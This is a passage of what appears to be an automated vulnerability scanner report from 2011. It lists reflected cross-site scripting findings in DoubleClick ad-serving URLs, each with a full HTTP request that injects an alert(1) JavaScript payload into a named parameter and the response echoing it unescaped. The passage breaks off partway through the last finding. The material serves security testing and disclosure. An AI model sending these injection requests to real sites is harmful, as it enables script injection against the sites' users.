Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7121

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
/click%3Bh%3Dv8/3af5/f/163/%2a/f%3B240320616%3B0-0%3B0%3B62289812%3B3454-728/90%3B41844250/41862037/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb139d0"-alert(1)-"6aa7e702a5c&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE
...[SNIP]...

5.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [redirecturl2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The value of the redirecturl2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db356"-alert(1)-"f49aabc7bfe was submitted in the redirecturl2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=db356"-alert(1)-"f49aabc7bfe HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6794

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
TX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=db356"-alert(1)-"f49aabc7bfehttp://www.metropcs.com/cell-phone-plans");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
v
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [rtbdata2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The value of the rtbdata2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f143"-alert(1)-"667d895dc3f was submitted in the rtbdata2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg4f143"-alert(1)-"667d895dc3f&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7121

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
AUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg4f143"-alert(1)-"667d895dc3f&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29");
var fscUrl = url;
var fsc
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [rtbip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The value of the rtbip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cdb3"-alert(1)-"210cce18065 was submitted in the rtbip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.1467cdb3"-alert(1)-"210cce18065&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6812

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
/f/163/%2a/r%3B240320616%3B1-0%3B0%3B62289812%3B3454-728/90%3B41885373/41903160/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.1467cdb3"-alert(1)-"210cce18065&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQG
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c32f1"-alert(1)-"34398203435 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1lsc32f1"-alert(1)-"34398203435&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7121

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/f/163/%2a/f%3B240320616%3B0-0%3B0%3B62289812%3B3454-728/90%3B41844250/41862037/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1lsc32f1"-alert(1)-"34398203435&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdh
...[SNIP]...

5.6. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67f26"-alert(1)-"730d1c99e22 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=856816067f26"-alert(1)-"730d1c99e22&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6560

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
JobMapFree_YahooTax_954x60.jpg";
var minV = 9;
var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=856816067f26"-alert(1)-"730d1c99e22&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954
...[SNIP]...

5.7. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c10f"-alert(1)-"a01146a9b07 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=17476652107c10f"-alert(1)-"a01146a9b07&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6544

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
minV = 9;
var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=17476652107c10f"-alert(1)-"a01146a9b07&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs
...[SNIP]...

5.8. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4995c"-alert(1)-"15005a1e215 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea10104995c"-alert(1)-"15005a1e215&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6560

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
;
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea10104995c"-alert(1)-"15005a1e215&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/j
...[SNIP]...

5.9. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d7f"-alert(1)-"cc146351d59 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFOb3d7f"-alert(1)-"cc146351d59&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6544

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFOb3d7f"-alert(1)-"cc146351d59&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs%3D%3fhttp
...[SNIP]...

5.10. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b59f2"-alert(1)-"a445a26e2b7 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241b59f2"-alert(1)-"a445a26e2b7&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6560

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
60.jpg";
var minV = 9;
var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241b59f2"-alert(1)-"a445a26e2b7&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/
...[SNIP]...

5.11. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d1cb"-alert(1)-"68a2a9ab89b was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G7d1cb"-alert(1)-"68a2a9ab89b&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6544

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Scroll_FREE_N_954x60.jpg";
var minV = 9;
var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G7d1cb"-alert(1)-"68a2a9ab89b&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B
...[SNIP]...

5.12. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 121f1"-alert(1)-"a54ea376143 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=121f1"-alert(1)-"a54ea376143 HTTP/1.1
